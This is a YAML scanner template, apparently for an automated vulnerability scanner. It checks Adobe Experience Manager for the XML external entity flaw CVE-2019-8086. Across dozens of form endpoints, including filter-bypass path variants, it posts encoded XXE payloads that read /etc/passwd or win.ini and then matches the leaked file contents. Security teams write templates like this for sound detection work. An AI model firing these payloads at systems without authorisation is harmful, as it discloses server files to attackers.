id: aem-xxe-cve-2019-8086
info:
  name: AEM XML External Entity (CVE-2019-8086) 
  risk: Critical

params:
  - root: '{{.BaseURL}}'

variables:
  - endpoint: |
      /content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer.af.internalsubmit.json
      /content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer.af.internalsubmit.json
      /content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer.af.internalsubmit.json
      /libs/fd/af/components/guideContainer/cq:template.af.internalsubmit.json
      ///libs///fd///af///components///guideContainer///cq:template.af.internalsubmit.json
      /libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer.af.internalsubmit.json
      /libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer.af.internalsubmit.json
      /libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer.af.internalsubmit.json
      /libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer.af.internalsubmit.json
      ///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer.af.internalsubmit.json
      /apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer.af.internalsubmit.json
      /apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer.af.internalsubmit.json
      /apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer.af.internalsubmit.json
      /content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      /content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      /content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/components/guideContainer/cq:template.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      ///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer.af.internalsubmit.css;%0arad.css
      /apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      /apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css
      /apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer.af.internalsubmit.css;%0arad.css

requests:
  - method: POST
    redirect: false
    url: >-
     {{.root}}{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4060.0 Safari/537.36
      - Referer: '{{.BaseURL}}'
      - User-Agent: curl/7.4
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")
  # for windows
  - method: POST
    redirect: false
    url: >-
     {{.root}}{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4060.0 Safari/537.36
      - Referer: '{{.BaseURL}}'
      - User-Agent: curl/7.4
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///c:/windows/win.ini\">]><afData>%26a%3b</afData>"}}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "[extensions]") && StringSearch("response", "for 16-bit app support")
